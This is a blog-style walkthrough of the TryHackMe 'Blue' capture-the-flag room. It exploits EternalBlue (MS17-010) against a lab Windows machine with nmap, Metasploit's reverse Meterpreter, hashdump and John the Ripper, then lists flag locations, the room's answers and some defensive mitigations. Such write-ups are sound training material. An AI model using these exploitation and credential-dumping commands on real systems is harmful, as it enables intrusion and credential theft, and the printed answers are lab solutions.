Skip to main content
🧠Educationalbeginner4 min read

THM: Blue Box – EternalBlue Exploitation

A walkthrough of the TryHackMe Blue room demonstrating the infamous EternalBlue (MS17-010) vulnerability exploitation.

TryHackMeCTFEternalBlueWindowsMetasploit
Share:𝕏in
🔗TryHackMe Series
Part 2 of 3
📚View all posts in TryHackMe series

THM: Blue Box – EternalBlue Exploitation

The TryHackMe Blue room teaches one of the most impactful vulnerabilities in recent history: EternalBlue (MS17-010). This exploit led to the WannaCry ransomware outbreak that affected organizations worldwide.

Room Information

  • Name: Blue
  • Platform: TryHackMe
  • Difficulty: Easy
  • Skills: Windows exploitation, Metasploit, post-exploitation

Background: What is EternalBlue?

EternalBlue exploits a vulnerability in Microsoft's SMBv1 implementation. It was allegedly developed by the NSA and leaked by the Shadow Brokers group in April 2017.

Impact

  • Used in WannaCry ransomware (May 2017)
  • Used in NotPetya attack (June 2017)
  • Billions of dollars in damages
  • Affected hospitals, shipping companies, governments

The Vulnerability

  • CVE-2017-0144
  • Buffer overflow in SMBv1
  • Allows remote code execution
  • Pre-authentication (no credentials needed)

Task 1: Recon

Deploy and Scan

nmap -sV -vv --script vuln 10.10.X.X

Key findings:

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 SP1
3389/tcp  open  tcpwrapped
|
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers

The machine is vulnerable to MS17-010!

Task 2: Gain Access

Starting Metasploit

msfconsole

Finding the Exploit

search ms17-010

Select the EternalBlue exploit:

use exploit/windows/smb/ms17_010_eternalblue

Configuring the Exploit

show options
set RHOSTS 10.10.X.X
set LHOST tun0

Exploitation

exploit

If successful, you'll receive a Meterpreter session:

[*] Meterpreter session 1 opened
meterpreter >

Task 3: Escalate

Checking Privileges

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We're already SYSTEM! EternalBlue gives us the highest privileges immediately.

Migrating Process

For stability, migrate to a more stable process:

meterpreter > ps

Find a SYSTEM process like spoolsv.exe:

meterpreter > migrate [PID]

Task 4: Cracking

Dumping Credentials

meterpreter > hashdump

Output:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Cracking with John

Save Jon's hash and crack:

echo "ffb43f0de35be4d9917ac0cc8ad57f8d" > hash.txt
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked: alqfna22

Task 5: Find Flags

Flag 1 - System Root

meterpreter > search -f flag1.txt
meterpreter > cat C:/flag1.txt

Flag 2 - Administrator Location

meterpreter > cat "C:/Windows/System32/config/flag2.txt"

Flag 3 - Excellent Location

Where would excellent administrators store documents?

meterpreter > cat "C:/Users/Jon/Documents/flag3.txt"

Alternative: Manual Exploitation

For learning purposes, you can also exploit MS17-010 without Metasploit:

Using Impacket

git clone https://github.com/worawit/MS17-010.git
cd MS17-010
python3 zzz_exploit.py 10.10.X.X

Using Standalone Exploits

Various researchers have released standalone exploits that don't require Metasploit.

Post-Exploitation Notes

What SYSTEM Access Means

With SYSTEM privileges, you can:

  • Read any file on the system
  • Dump all credential hashes
  • Install persistence
  • Pivot to other systems
  • Access encrypted files

Real-World Impact

In a corporate environment, this single vulnerability could:

  • Compromise the entire domain
  • Access sensitive business data
  • Deploy ransomware
  • Establish persistent access

Defense & Mitigation

Immediate Actions

  1. Apply MS17-010 patches
  2. Disable SMBv1
  3. Block port 445 at the perimeter
  4. Segment networks

Detection

  • Monitor for unusual SMB traffic
  • Look for EternalBlue signatures
  • Detect post-exploitation activities
  • Network traffic analysis

Verification

# Check if SMBv1 is enabled
Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

Questions & Answers

  1. How many ports are open under 1000? 3
  2. What is this machine vulnerable to? ms17-010
  3. What is the name of the non-default user? Jon
  4. What is Jon's password? alqfna22

Key Takeaways

Technical

  • EternalBlue is devastatingly effective
  • Metasploit makes exploitation straightforward
  • Post-exploitation is crucial for impact

Strategic

  • Patch management is critical
  • Legacy protocols create risk
  • Network segmentation limits damage

Tools Used

  • nmap
  • Metasploit Framework
  • John the Ripper
  • Meterpreter

Want to learn more about Windows exploitation? Contact us: m1k3@msquarellc.net

Found this helpful? Share it:

Share:𝕏in

Need Help With This?

Have questions about implementing these security practices? Let's discuss your specific needs.

Get in Touch

More in Educational

Explore more articles in this category.

Browse 🧠 Educational

Related Articles